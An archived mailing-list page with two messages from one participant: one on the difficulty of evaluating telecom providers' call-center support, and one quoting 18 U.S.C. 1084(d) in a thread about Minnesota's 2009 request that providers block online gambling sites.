2008-12-28 Thread Matthew Black

On Sat, 27 Dec 2008 11:53:18 +
 Martin List-Petersen  wrote:


The problem is, and this was stated by the original poster, that the
lads off-shore he deals with have no clue and simply stick to the
script. No intention of looking what the real problem is. And that
problem lies not in the call center. It is the deal, that $TELCO struck
with $CALLCENTER and the procedures, that were put in place, that are
the problem.

Only solution: find a provider, whose support (off-shore or not) does
have a clue, has an escalation process and is willing to find a solution.



How does one find such a provider? I'm unaware of any company
that lets potential customers test drive their $SERVICE call center
before purchase. Even if one did, how is a potential customer
supposed to evaluate the competence of said call center when
customer has no clue as to what problems may arise 5 years after
purchase of provider's service, whether said test drive provided
an accurate and appropriate solution, and whether said call center
quality will exist 5 years after purchase of the service.

matthew black
long beach, ca



Re: Minnesota to block online gambling sites?

2009-05-04 Thread Matthew Black
Instead of huffing and puffing your libertarian perspective (you called the 
AG's letter garbage), you might make a quick Google search of 
"18USC1084(d)," which provides a wealth of information on the legality of 
such enforcement actions.


http://openjurist.org/325/f2d/148

Excerpted from the court decision:

18 U.S.C. 1084(d). 'When any common carrier, subject to the jurisdiction of 
the Federal Communications Commission, is notified in writing by a Federal, 
State, or local law enforcement agency, acting within its jurisdiction, that 
any facility furnished by it is being used or will be used for the purpose 
of transmitting or receiving gambling information in interstate or foreign 
commerce in violation of Federal, State or local law, it shall discontinue 
or refuse, the leasing, furnishing, or maintaining of such facility, after 
reasonable notice to the subscriber, but no damages, penalty or forfeiture, 
civil or criminal, shall be found against any common carrier for any act 
done in compliance with any notice received from a law enforcement agency. 
Nothing in this section shall be deemed to prejudice the right of any person 
affected thereby to secure an appropriate determination, as otherwise 
provided by law, in a Federal court or in a State or local tribunal or 
agency, that such facility should not be discontinued or removed, or should 
be restored.'



matthew black
speaking only for myself and not my employer
california state university, long beach



On Sat, 2 May 2009 09:39:02 -0400
 Jeffrey Lyon  wrote:

What a pile of garbage. I would definitely get a legal review of a
request like that before blocking any of my customer's traffic.


--
Jeffrey Lyon, Leadership Team
jeffrey.l...@blacklotus.net | http://www.blacklotus.net
Black Lotus Communications of The IRC Company, Inc.

Look for us at HostingCon 2009 in Washington, DC on August 10th - 12th
at Booth #401.



On Sat, May 2, 2009 at 9:34 AM, Ken Gilmour  wrote:
For anyone who cares, IMEGA released the letter from the state of 
Minnesota:


http://www.imega.org/wp-content/uploads/2009/05/ab001dd4.pdf

2009/4/29 Ken Gilmour :

Hi there,

I am just wondering if anyone knows any more about the attempt by
Minnesota to block online gambling companies other than what's
publicly available (e.g.
http://www.gambling911.com/gambling-news/minnesota-regulators-try-block-access-gambing-sites-042909.html)?
Such as a list or the letter to the providers?

Thank you!

Ken